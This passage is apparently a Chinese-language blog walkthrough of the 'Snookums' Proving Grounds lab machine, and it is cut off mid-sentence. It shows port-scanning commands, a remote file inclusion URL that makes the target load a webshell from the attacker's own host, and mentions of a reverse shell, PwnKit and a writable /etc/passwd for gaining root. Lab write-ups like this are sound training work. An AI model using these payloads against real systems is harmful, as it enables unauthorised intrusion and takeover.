發表文章

目前顯示的是有「SimplePHPGal」標籤的文章

Proving Grounds Practice : Snookums Walkthrough

圖片
 Proving Grounds Practice : Snookums Walkthrough Foothole (立足點 ) : 80 發現 Simple PHP Gallery v0.8,但使用 v0.7 的 RCE 成功拿到 Reverse Shell PE ( 提權 ) : linpeas 跑完 PwnKit 直接 root 另一種方式是 /etc/passwd 檔案可寫入,加入一個 root 使用者,切換使用者提權成功 Rustscan,└─$ rustscan -a 192.168.103.58 --scripts none --ulimit 5000 | tee rustscan snmp check,└─$ sudo nmap -sU -p 161 192.168.103.58 | tee snmp nmap,└─$ sudo nmap -sCV -sA -p 21,22,80,111,139,445,3306,33060 192.168.103.58 | tee nmap      FTP 可以匿名登入,切換 passive 但甚麼指令都下不了 whatweb,└─$ whatweb -v http://192.168.103.58 | tee whatweb MySQL 測試登入,IP 被拒絕 enum4linux,└─$ enum4linux -a 192.168.103.58 | tee enum4linux 看來掃到一個使用者 michael 80 / Simple PHP Photo Gallery v0.8 80 /robots.txt 先查 Exploit-DB,看來有 LFI LFI 打打看,沒有回應 有看到另外一個 0.7 版本的 RFI POC 如下, [+] site.com/image.php?img= [ PAYLOAD ] 試試看吧,測試遠端開啟 webshell.php 看來有作用 kali 的 HTTP Server 顯示有被存取 webshell.php 但是靶機沒有開啟該網頁 192.168.103.58/image.php?img=http://192.168.45.179/tools/webshell.php 直接改用 Reverse Shell 的 php htt...